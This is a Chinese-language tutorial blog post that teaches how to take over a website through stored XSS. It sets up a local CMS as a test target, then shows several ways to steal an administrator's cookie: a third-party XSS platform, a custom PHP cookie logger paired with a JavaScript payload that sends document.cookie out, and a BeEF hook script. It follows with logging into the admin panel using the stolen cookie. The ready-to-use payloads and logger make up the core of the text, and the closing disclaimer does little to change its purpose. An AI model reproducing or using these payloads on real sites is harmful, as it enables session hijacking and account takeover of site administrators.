xss跨站攻击详讲 | 如何利用xss拿下一个站？

1.初识xxs跨站漏洞

xss能干什么？

利用xss获取对方后台地址、cookie信息，得到cookie和后台地址后，能通过相关工具（比如postman）进行后台登录：

其他补充：

cookie ：一般用于小中型网站，一般存储在自己电脑上，存活时间较长
session：采用会话模式，一般用于大型网站，一存储在服务器上，存活时间较短

2.xss的类型

2.1反射型

当在网页插入下列xss代码后，会立即回馈到屏幕，但这条xss代码并不会一直存储到该网站上

<script>alert(1)</script>

提交后返回：

2.2存储型

利用xss跨站漏洞，基本都是建立在存储型上，其他类型只作了解

例如留言板、评论、订单信息、反馈等，能一直留在后台上

2.3DOM型

采用JavaScript进行处理，保存在前端

这句代码并不包含攻击性，可以用来测试是否有xss漏洞

<script>alert(1)</script>

同时，也可以改成带攻击的代码，进行窃取cookie

3.测试环境搭建

3.1搭建测试网站

首先下载军锋真人cs野战的源码：
http://js.down.chinaz.com/201202/jfdd_v2.0.zip

解压到网站目录，访问网站地址127.0.0.1/jfdd/install.php
进行一步步安装即可（后台密码也在这儿设置）
设置好能够登录网站后台，表示初始化成功

3.2获取xss攻击代码

在xss平台注册账号，并创建好项目：
https://xss8.cc/
创建项目配置代码这块可以根据自己的需求勾选，我这里只勾选了默认

配置好后，点击查看代码

我们这里随便选取一条代码即可

4.实战演示

随便选择一条代码，放到登录界面任意位置，点击提交即可

这时候，只要网站管理员登录到后台查看了这条信息，就可以截取到对方的cookie值。
模拟管理员登录后台，并查看此条信息

在xxs平台即可看到截获的cookie

只要获取到完整的cookie数据，我们就可以利用工具进行连接登录到后台，（完整cookie包括cookie和session，但是一般xss平台是截取不到session的，所以请读者另想办法，思路：获取phpinfo中的cookie）
然后我们使用postman进行连接登录后台即可

5.利用自定义xss获取cookie

1.在web服务器上创建一个write_cookie.php文件
write_cookie.php代码如下

<?php
$cookie=$_GET['c'];
$str=fopen('cookie.txt','w');
fwrite($str,"$cookie");
fclose($str);
?>

代码解释
$cookie=$_GET['c'];获取链接中c参数的值
其他代码就打开并写入到cookie.txt文件中

2.在web服务器端创建send_cookie.js文件
代码如下：

其中src的地址为自己服务器的地址

new Image().src="http://127.0.0.1/write_cookie.php?c=" + encodeURI(document.cookie);

构造payload

<script src=http://127.0.0.1/send_cookie.js></script>

将构造好的payload插入到测试点中

当管理员登录到后台查看此订单时，将会将管理员cookie数据发送到web服务器

查看服务器，收到了cookie数据

6.beef工具实现xss

beef安装教程：
https://blog.csdn.net/weixin_43148062/article/details/105601649
配置好beef之后，写一个payload，src为beef的服务器地址(在beef配置文件中可以看到)

<script src="//127.0.0.1:3000/hook.js"></script>

和之前的步骤一样，将payload写入测试站

登录beef后台，当测试站管理员登录并查看信息后，beef后台将会有主机上线（xx号已上机~欢迎您的使用[doge]）

使用beef获取网站cookie

beef的功能很强大，这里仅示范一个获取cookie的操作，其他请读者自行探索！

xss相关补充文章：

== 你知道吗，你用的大马可能早就被别人装后门了！！==

如何检查自己用的大马是否被写了后门？如何利用xss反杀别人写了后门的大马？
欢迎继续阅读下篇文章：“黑吃黑”的webshellbox

本篇文章仅作技术学习研究，切勿拿来行坏事！！任何违法操作都与本文作者无关。